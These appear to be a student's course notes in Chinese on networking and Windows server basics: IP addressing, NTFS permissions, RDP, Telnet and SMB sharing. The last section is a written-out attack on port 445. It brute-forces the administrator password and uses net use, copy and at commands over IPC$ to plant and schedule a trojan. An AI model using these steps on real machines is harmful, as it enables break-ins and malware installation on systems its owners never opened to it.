千峰笔记【数通基础】Day5—Day7

1000phoneWEB311课程笔记（Day5—Day7）

通过写博客的形式加深印象，整理笔记。欢迎大佬们指正错误。之后基本上隔一两天写一下最近所学（ps：千锋nb）

一、IP地址概述

1、简单的局域网构成：

PC–交换机—PC
| { -和 | 为网线}
PC（或者其他IT终端）
局域网：一般称为内网
简单的局域网的构成：交换机、网线、PC（或者其他IT终端）

2、IP地址

IP地址就是一个唯一标识，是一段网络编码（二进制），由32位组成（4x8）
IP地址形式：X.X.X.X X的范围：0-255

3、子网掩码

子网掩码： subnet mask =SM
局域网通信规则**： 在同一个局域网中，所有的IP必须在同一网段中才可以互相通信！
IP地址构成： 网络位+主机位 （网络位相同的IP地址，为同一网段）
子网掩码： 用来确定IP地址的网络位
子网掩码如何确认网络位：与255对应的数字为网络位，与0对应的数字为主机位
255.0.0.0
255.255.0.0
255.255.255.0

4、IP地址详解

国际标准组织ISO定义地址分类：五大类 （是以IP地址的第一位进行区分的）
A类： 1-126 默认子网掩码：255.0.0.0
B类： 128-191 默认子网掩码：255.255.0.0
C类： 192-223 默认子网掩码：255.255.255.0
D类： 224-239 组播地址
E类： 240-254 科研使用
注：
1. 目前我们可以使用的只有A、B、C3类
2. ABC 3类的子网掩码可以修改！
3. 255开头得当作子网掩码来使用了
4. 127开头当作回环地址：如127.0.0.1，代表自己
5. 当主机位全部置0代表网段，主机位全部置255代表该网段的广播地址

5、网关

网关：一个网络的出口，Gateway=GW，一般网关是在路由器上
路由器：可用连接内外网的设备。
PC向外发包判断顺序：
1、首先判断目标IP地址与自己是否在同一网段。
2、如在同一网段，则直接发出去，而不找网关
3、如不在同一网段，则直接发包给网关

6、如何查看IP

win+R – cmd –
ipconfig # 查看IP地址基本信息
ipconfig /all # 查看IP地址详细信息
nslookup ip

二、NTFS权限

1、作用

1、通过设置NTFS权限，实现不同的用户访问不同的权限
2、分配了正确的访问权限后，用户才能访问其资源
3、设置权限防止资源被篡改、删除

2、NTFS文件系统特点

1. 提高磁盘读写性能
2. 可靠性 加密文件系统 访问控制列表（设置权限）
3. 磁盘利用率 压缩 磁盘配额
4. 支持单个文件大于4个G

3、修改NTFS权限

STEP1：取消权限继承（方便任意修改权限列表）
方法：文件夹右键属性–安全–高级–去掉第一个对号–选择复制按钮
STEP2：文件（夹）右键属性–安全–对应不同用户设置不同权限
PS：当用户属于多个组时，权限是累加的
取得所有权
默认只有administrator有这个权限！
作用：可以将任何文件夹的所有者改为administrator

4、文件复制对权限的影响

文件复制后，文件的权限会被目标文件夹的权限覆盖：
同分区复制 – 覆盖
同分区移动 – 不变
不同分区移动 – 覆盖
不同分区复制 – 覆盖

三、服务器远程管理（RDP）

①端口号：3389
②操作流程：1）客户机和服务器可以ping通
2）服务器开启3389服务（用netstat -an查看开启的端口号）
如何开启3389：我的电脑–右键属性–远程设置–选择允许
3）客户机上 win+R–mstsc–输入服务器的IP及账户

四、TELNET

①端口号：23
②开启方式：1、首先将配置网络，并实现客户机与服务器可以互通。
2、服务器开启允许被telnet远程控制：开始 – 运行 – 输入services.msc，并开启telnet服务。
3、客户机上：开始 – 运行 – 输入cmd。
4、在命令行窗口中输入：telnet 服务器IP。
5、输入服务器的账号及密码。win+R，在services.msc中开启telnet服务。
注意：如服务器是2008及更高版本系统，需要再第二步前先按照telnet服务：计算机右键管理 – 功能 – 按
照telnet 服务，另外如使用非管理员账户登录远程，需要再服务器上将用户加入到远程桌面内置组中。
③作用：在命令行中远程管理服务器。

三（图形界面）和四（命令行）为服务器远程管理的两种模式

五、文件共享服务器

①端口号：445，系统默认是开启的，所以hackers容易从此端口种木mua。
②创建共享：1）概述：通过网络提供文件共享服务，提供文件下载和上传服务（类似于FTP服务器）
2）操作：文件夹右键属性–共享–开启共享–设置共享名–设置共享权限
注：
Ⅰ、在本地登录时，只受NTFS权限的影响
Ⅱ、在远程登录时，将受共享及NTFS权限的共同影响，且取交集！
Ⅲ、所以建议设置共享权限为everyone完全控制，然后具体的权限需求在NTFS权限中设置即可。
③访问共享：在开始运行（win+R）或我的电脑地址栏中，输入UNC地址： \文件共享服务器IP or
\文件共享服务器IP\共享名
④创建隐藏共享：在共享名后面加 $ 符号
⑤共享相关命令：net share 列出共享列表
net share 共享名 /del 删除共享
⑥如何屏蔽系统隐藏共享自动产生（主要针对win7以下系统）：
6.1、打开注册表
打开注册表编辑器：regedit
6.2、定位共享注册表位置
HKEY_Local_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\ 右键新建REG_DWORD类型的AutoShareServer 键，值为 0
6.3、打开services.msc，并停止及禁用server服务（此操作关闭了445端口）
禁止被访问445，配置高级安全防火墙-入站规则（在win7及以上系统，win2008及以上系统）

六、利用445端口传播木mua

1、木mua概述：

木mua通常称为嘿客程序，恶意代码，也称为特洛伊木mua。 是基于远程控制的嘿客工具
组成： 客户端程序 客户端程序是安装在攻击者（嘿客）方的控制台，它负责远程遥控指挥
服务器端程序 服务器端程序即是木mua程序，它被隐藏安装在被攻击（受害）方的电脑上，目标主机也称为肉鸡
危害：很大
中了木mua的征兆：硬盘不停的读写，鼠标键盘不好使了，窗口突然被关闭或者打开。

2、攻击思路：

			  ①先扫描开了445端口的服务器（scanport）
			  ②IPC$暴力破解：生成密码字典，用NTscan工具爆破，获得对方administrator的密码
			  ③与目标主机建立IPC $：net use \\目标机IP\ipc (没有空格) $ 密码/user：用户名
			  ④植入木mua到目标机：copy 自己电脑的木mua应用程序地址（通常为.exe) \\目标机ip\ipc (没有空格) $\
			  ⑤设置目标主机运行木mua：net time \\目标机IP
			  												 at \\目标机IP 准确时间（，如15：59）c:\木mua名
			  时辰一到，在自己的电脑木mua制造器上就可以为所欲为了